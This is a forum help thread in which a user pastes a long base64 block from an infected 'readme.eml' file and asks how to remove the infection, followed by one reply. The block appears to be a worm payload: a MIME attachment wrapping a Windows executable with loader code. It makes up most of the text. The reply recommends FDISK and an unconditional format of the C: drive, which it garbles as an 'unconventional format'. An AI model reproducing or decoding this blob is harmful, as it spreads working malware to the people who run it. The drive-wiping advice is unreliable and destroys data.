DQpDb250ZW50LWlkOiBUSEUtQ0lEDQoNCgBYi/xX/3UMV/91DFD/dQj/lpwAAACL54lF/IHEAAEAAGGLRfzJwggAyAQAAGDHRfwAAAAA6EEAAABBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWmFiY2RlZmdoaWprbG1ub3BxcnN0dXZ3eHl6MDEyMzQ1Njc4OSsvAF6LfRCLVQzB4gMz2zPAuQYAAADR4FP/dQjoMAAAAEp0DUPi74oEBvyq/0X8695J0+CKBAb8qv9F/NHpAU38sD3886oywKphi0X8ycIMAMgAAABRUlaLdQiLTQyL0cHqA4oUFvbRgOEH0uqA4gEKwl5aWcnCCABYUegDAAAA6zrpZGf/NgAAZGeJJgAA6BwAAAD/Moki/+DpWOgPAAAAiyKPAmRnjwYAAFlZ/+Dp6AQAAACI/hIAWsPpyAAAAOgIAAAA6NH/////4elZi0UQiYi4AAAAM8DJwhAA6GcBAABNWlAAAQIAAwQAAQ8AAf//AAK4AAdAAAEaACIBAAK6EAABDh+0Cc0huAFMzSGQkFRoaXMgcHJvZ3JhbSBtdXN0IGJlIHJ1biB1bmRlciBXaW4zMg0KJDcAiFBFAAJMAQQAAbUs74IACOAAAY6BCwECGQABAgADBgAHEAADEAADIAAEQAACEAADAgACAQAHAwABCgAGUAADBAAGAgAFEAACIAAEEAACEAAGEAAMMAACTgAcQAACDABTQ09ERQAFEAADEAADAgADBgAOIAACYERBVEEABRAAAyAAAwIAAwgADkAAAsAuaWRhdGEAAxAAAzAAAwIAAwoADkAAAsAucmVsb2MAAxAAA0AAAwIAAwwADkAAAlAA/wD/AP8Aa8P/JTAwQAD/AP8A/wD9KDAACjgwAAIwMAAWRjAABkYwAAZLRVJORUwzMi5kbGwABFNsZWVwAP8AtRAAAgwAAwMwAP8A/wD/APkAAF+KB0cKwHQNUIvEagFQU/9WOFjr7A+2D0fjEVFQi8RqAVBT/1Y4WFni8evVw+nIAAAAgewAAQAAM/aL/Ga4DQq5DAAAAPzzZqvo9vD//4sUtAPhigJC/KoKwHX36AkAAAC3osvNz/vPogDoBAAAADO21HdYagD/EAvAdFeL2OgEAAAAuWfUd1hqBVP/EAvAdEKL2OgEAAAAIl/Ud1+B7AAQAABUaAAQAABqDVP/F4HEABAAAAvAdRtUaAAQAABqDFP/F0aD5gd1CoHEAAEAAMnCBADoBAAAAOob5ndYaPQBAAD/EOlR////6cgAAACLXQiB7AABAACL/OgIAAAAUnVub25jZQBeaAABAADoBAAAAIN43XdYVFdqAGoAVlP/EFjoBAAAAGbZ3XdYagBqAGoEagBT/xDoBAAAAOfr3XdYaAABAABXagFqAFZT/xDr0enIAAAA6AQAAAB54IF8WP91CGoAaP8PHwD/EAvAdCyL2OgEAAAAMCWAfFhq/1P/EOgAAAAAWYPBGpCQkOgEAAAATRGGfFhqAVH/EMnCBADpyAAAAGBQDwFMJP5Yg8AYixiLUAToCwAAAGCJGIlQBPzzpGHP+maPAGaPQAaLdQiLfQyLTRDM+2HJwgwA6cgAAABgi0UIagBQUGoA/5aQAAAAYcnCBAAAAAAAAAAAAMMAAAAAAAAAAAAAAAAAAAA=

note that " MIQROZOF-9J4FK3" is my computer name.

I did a "Full" format as available in windows 2000 & xp.

which software to download to remove

"readme.eml" stuff.

It also effects my .html files as you posted recently.

Grand Master

Panacik

Posted
Posted

That is one big script! You really shouldnt have opened that file.

Simply put, you nede to boot in to dos and do an unconventional format. After first performing an FDisk. To do this type - Format c: /u

If you still have the file appearing after this, then i am not sure what is happening. I mean, are you trying to reinstall the game again after you instal, as this would bring the virus back...

This topic is now closed to further replies.
 Share
Go to topic listing

  • Recently Browsing   0 members

    • No registered users viewing this page.